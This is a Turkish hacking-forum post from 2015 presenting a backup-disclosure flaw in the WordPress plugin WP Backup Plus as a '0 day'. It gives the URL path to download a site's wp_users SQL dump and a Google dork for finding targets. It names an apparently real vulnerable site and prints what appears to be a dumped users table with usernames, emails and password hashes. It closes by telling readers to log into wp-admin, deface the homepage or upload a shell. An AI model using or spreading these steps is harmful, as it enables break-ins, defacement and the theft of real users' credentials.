Cyber-Warrior.Org \ Doküman \ Exploits / Vulnerabilities > WP Backup Plus 0 day Vuln; WP Hacking
| Madde |
| |
Yazar : BMNR |
| |
Date : 18.10.2015 13:46:25 |
| |
# WP Backup Plus 0 day Vuln; WP Hacking |
| |
Bu konuda WBP ile WordPress users sql tablosunun WP sürümü farketmeksizin çekilmesini gösterecegim.Öncelikle plugin i taniyalim.. Ne ise yaradigini ögrenelim WP Backup Plus (http://wpbackupplus.com/) ücretli bir plugin, yedekleme islemlerinde kullanicilara oldukca kolaylik sagliyor. WPD de olmamasi ve ücretli olmasiyla çok sayida ticari ve kurumsal kurulus bu eklentiyi tercih ediyor.Açigimiz...Backup Disclosure diger bir tanimla Exposure of Backup File to an Unauthorized Control SphereYani bu açikla yetkisiz erisim klasörüne kaydedilen backup yolunu takip edebilir, url üzerinden SQL komutlari ile users tablosunu rahatlikla çekebilirsiniz..Büyük ihtimal bu açigi ilk defa duyuyorsunuz.. Kullanimi çok basit.. SQL benzeri komut ile açik sayesinde tablolari çekiyoruzÖncelikle CWE linkini birakayim, detayli incelemek isteyen arkadaslar için..https://cwe.mitre.org/data/definitions/530.htmlZafiyet kodumuza geçelim, asagidaki komut ile bu eklentide bulunan açiktan yararlanarak istedigimiz tablonun sql bilgilerini çekecegiz..temp/wp_users.sql ya da "Tablo Ismi".Muhtemelen wp users tablosu disinda baska bir komut kullanmayacaginiz için direk users bilgilerini çekmeyi gösteriyorum:)Kullanacagimiz komut : http://attack.com/wp-backup-plus/temp/wp_users.sqlBu komutu eklentinin bulundugu web site plugin url uzantisina ekliyoruz ve karsimiza eklentide bulunan Backup Disclosure açigi sayesinde SQL ile user tablosu çikiyorDROP TABLE IF EXISTS `wp_users`;
CREATE TABLE `wp_users` (
`ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`user_login` varchar(60) NOT NULL DEFAULT ’’,
`user_pass` varchar(64) NOT NULL DEFAULT ’’,
`user_nicename` varchar(50) NOT NULL DEFAULT ’’,
`user_email` varchar(100) NOT NULL DEFAULT ’’,
`user_url` varchar(100) NOT NULL DEFAULT ’’,
`user_registered` datetime NOT NULL DEFAULT ’0000-00-00 00:00:00’,
`user_activation_key` varchar(60) NOT NULL DEFAULT ’’,
`user_status` int(11) NOT NULL DEFAULT ’0’,
`display_name` varchar(250) NOT NULL DEFAULT ’’,
PRIMARY KEY (`ID`),
KEY `user_login_key` (`user_login`),
KEY `user_nicename` (`user_nicename`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=latin1;
;
INSERT INTO `wp_users` VALUES(’1’, ’rudy’, ’$P$Bom7z3SEA7OPuoNqU6vqu1Ue58Zep6.’, ’’, ’[email protected]’, ’’, ’2013-09-09 22:16:43’, ’’, ’0’, ’’),(’2’, ’jayann’, ’$P$BhbL2uw.6kqhV8F0IquR09u1JvPYj50’, ’jayann’, ’[email protected]’, ’’, ’2014-08-13 03:35:35’, ’’, ’0’, ’jay ann’),(’3’, ’jedi’, ’$P$BTcjTYMr848ZyofmYvWJkiLPh2jgHR0’, ’jedi’, ’[email protected]’, ’’, ’2014-08-30 03:26:13’, ’’, ’0’, ’Jedi Cordova’),(’4’, ’jess’, ’$P$BpVE2.vDd8X6jq1sImB3uAsQYdQmXS/’, ’jess’, ’[email protected]’, ’’, ’2014-10-15 12:30:57’, ’’, ’0’, ’jess’);Gelelim bazi dork sonuçlarina..# dork : inurl:/wp-content/uploads/wp-backup-plus/ATTACKGoogle dorku disinda ücretli wp databaselerinden bu eklentiyi kullanan siteleri tespit edip nokta atisi yapabilirsiniz.Mesela bu link de açik var..http://easy-family-boating-recipes.com/wp-content/uploads/wp-backup-plus/temp/cnb24p_users.sqlUser ile passwordu alip wp-admine girerek anasayfaya index basabilir ya da shell v.b türevler upload edebilirsiniz... |
| |
|
| |
|
|
